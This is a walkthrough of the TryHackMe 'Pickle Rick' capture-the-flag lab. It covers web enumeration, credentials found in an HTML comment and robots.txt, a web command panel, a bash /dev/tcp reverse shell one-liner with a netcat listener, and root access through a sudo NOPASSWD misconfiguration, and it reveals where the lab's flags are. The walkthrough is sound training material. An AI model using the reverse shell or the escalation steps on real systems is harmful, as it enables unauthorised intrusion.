Papadope Course
EN | ΕΛ

Pickle Rick - TryHackMe Walkthrough

Pickle Rick - TryHackMe Walkthrough

A Rick and Morty themed CTF requiring web enumeration, command injection exploitation, and privilege escalation to find three secret ingredients.

Room URL: https://tryhackme.com/room/picklerick

Difficulty: Easy

Tools & Techniques Used

  • Nmap
  • ffuf / Gobuster
  • Web shell exploitation
  • Reverse shell
  • linPEAS
  • sudo misconfiguration

Step-by-Step Walkthrough

1. Enumeration

Nmap scan:

nmap -sC -sV -oN nmap.txt <TARGET_IP>

Findings:

Port Service Notes
22 SSH OpenSSH (Ubuntu)
80 HTTP Apache web server

2. Web Enumeration

Visit the website at http://<TARGET_IP>. It appears to be a static page about Rick needing help.

Check the page source — you'll find a username in an HTML comment:

<!-- Username: R1ckRul3s -->

3. Directory Discovery

Use ffuf or Gobuster to find hidden files:

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://<TARGET_IP>/FUZZ

Or:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt -x php,txt

Found:

  • /robots.txt — Contains a strange string (potential password)
  • /login.php — Login page

4. Check robots.txt 

curl http://<TARGET_IP>/robots.txt

This reveals a strange word — this is the password for the login page.

5. Login and Command Panel

Navigate to http://<TARGET_IP>/login.php and log in with:

  • Username: R1ckRul3s
  • Password: (string from robots.txt)

After login, you'll find a Command Panel — this is a web shell!

Test it:

id

You'll see you're running as www-data.

6. Finding the Ingredients

First Ingredient

List files in the current directory:

ls -la

You'll see Sup3rS3cretPickl3Ingred.txt. Some commands like cat are blocked, but you can use:

grep . Sup3rS3cretPickl3Ingred.txt

Or simply navigate to http://<TARGET_IP>/Sup3rS3cretPickl3Ingred.txt in your browser.

Second Ingredient

Check the clue file:

grep . clue.txt

It hints to look in the file system. Check Rick's home directory:

ls -la /home/rick

Read the second ingredient:

grep . "/home/rick/second ingredients"

7. Getting a Reverse Shell (Optional)

For easier navigation, get a proper reverse shell.

On your machine:

nc -lvnp 4444

In the command panel:

bash -c "bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1"

8. Privilege Escalation

Check sudo permissions:

sudo -l

Finding: www-data can run ALL commands as root without a password!

User www-data may run the following commands:
    (ALL) NOPASSWD: ALL

This is a critical misconfiguration.

9. Third Ingredient (Root Flag)

Escalate to root and find the final ingredient:

sudo ls /root
sudo cat /root/3rd.txt

Or simply:

sudo bash
cd /root
cat 3rd.txt

Summary of Ingredients

# Location How to Read
1st /var/www/html/Sup3rS3cretPickl3Ingred.txt Browser or grep
2nd /home/rick/second ingredients grep command
3rd /root/3rd.txt sudo cat

Key Takeaways

  • Always check page source — credentials are often hidden in HTML comments
  • Check robots.txt — may contain sensitive information
  • Command injection — when cat is blocked, try grep, less, head, tail, or direct browser access
  • sudo -l is essential — misconfigured sudo can give instant root

💬 Join our Discord community: https://discord.gg/CVpyqCek

Previous OhSINT - TryHackMe Walkthrough Next RootMe - TryHackMe Walkthrough